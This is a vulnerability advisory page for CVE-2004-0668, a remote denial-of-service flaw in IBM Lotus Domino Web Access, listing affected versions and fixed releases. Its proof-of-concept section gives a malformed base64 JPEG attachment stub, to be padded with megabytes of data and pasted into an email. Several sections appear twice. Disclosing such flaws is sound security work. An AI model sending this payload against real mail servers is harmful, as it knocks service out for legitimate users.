IBM Lotus Domino Server Web Access Malicious Email View Remote Denial Of Service Vulnerability
BID:10641
Info
IBM Lotus Domino Server Web Access Malicious Email View Remote Denial Of Service Vulnerability
| Bugtraq ID: | 10641 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: |
CVE-2004-0668 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 30 2004 12:00AM |
| Updated: | Jul 12 2009 05:16AM |
| Credit: | Discovery of this vulnerability is credited to Andreas Klein <[email protected]>. |
| Vulnerable: |
Lotus Domino 6.5.1 IBM Lotus Domino 6.5.2 IBM Lotus Domino 6.5.1 IBM Lotus Domino 6.5 .0 IBM Lotus Domino 6.0.3 IBM Lotus Domino 6.0.2 CF2 IBM Lotus Domino 6.0.2 IBM Lotus Domino 6.0.1 IBM Lotus Domino 6.0 |
| Not Vulnerable: | |
Discussion
IBM Lotus Domino Server Web Access Malicious Email View Remote Denial Of Service Vulnerability
Lotus Domino Server is reported prone to a remote denial of service vulnerability. The issue is reported to exist when a malicious email that is received on the affected server, is opened through the Domino Web Access interface by a client.
A remote attacker may exploit this condition to deny Lotus Domino service to legitimate users.
Lotus Domino Server is reported prone to a remote denial of service vulnerability. The issue is reported to exist when a malicious email that is received on the affected server, is opened through the Domino Web Access interface by a client.
A remote attacker may exploit this condition to deny Lotus Domino service to legitimate users.
Exploit / POC
IBM Lotus Domino Server Web Access Malicious Email View Remote Denial Of Service Vulnerability
The following proof of concept is available:
(just paste all the lines below into the body of the mail)
--- snip here; do not paste this line --
Content-Disposition: Attachment; filename="PC210017.JPG"
Content-Type: image/jpeg;
Name="PC210017.JPG"
Content-Transfer-Encoding: Base64
/9j/4Re0RXhpZgAASUkqAAgAAAALAA4BAgAgAAAAkgAAAA8BAgAYAAAAsgAAABABAgAMAAAA
ygAAABIBAwABAAAAAQAAABoBBQABAAAA2AAAABsBBQABAAAA4AAAACgBAwABAAAAAgAAADEB
AgAJAAAA6AAAADIBAgAUAAAACAEAABMCAwABAAAAAgAAAGmHBAABAAAAHAEAAAADAABPTFlN
[Add here some megabytes of data. 1kB is not enough, but 12MB was
sufficient in all my tests]
--- snip here; do not pste this line ---
The following proof of concept is available:
(just paste all the lines below into the body of the mail)
--- snip here; do not paste this line --
Content-Disposition: Attachment; filename="PC210017.JPG"
Content-Type: image/jpeg;
Name="PC210017.JPG"
Content-Transfer-Encoding: Base64
/9j/4Re0RXhpZgAASUkqAAgAAAALAA4BAgAgAAAAkgAAAA8BAgAYAAAAsgAAABABAgAMAAAA
ygAAABIBAwABAAAAAQAAABoBBQABAAAA2AAAABsBBQABAAAA4AAAACgBAwABAAAAAgAAADEB
AgAJAAAA6AAAADIBAgAUAAAACAEAABMCAwABAAAAAgAAAGmHBAABAAAAHAEAAAADAABPTFlN
[Add here some megabytes of data. 1kB is not enough, but 12MB was
sufficient in all my tests]
--- snip here; do not pste this line ---
Solution / Fix
IBM Lotus Domino Server Web Access Malicious Email View Remote Denial Of Service Vulnerability
Solution:
IBM has announced that fixes for this issue will be included in Lotus Domino 6.0.5 and 6.5.3 when these versions are released.
---
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
IBM has announced that fixes for this issue will be included in Lotus Domino 6.0.5 and 6.5.3 when these versions are released.
---
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
IBM Lotus Domino Server Web Access Malicious Email View Remote Denial Of Service Vulnerability
References:
References: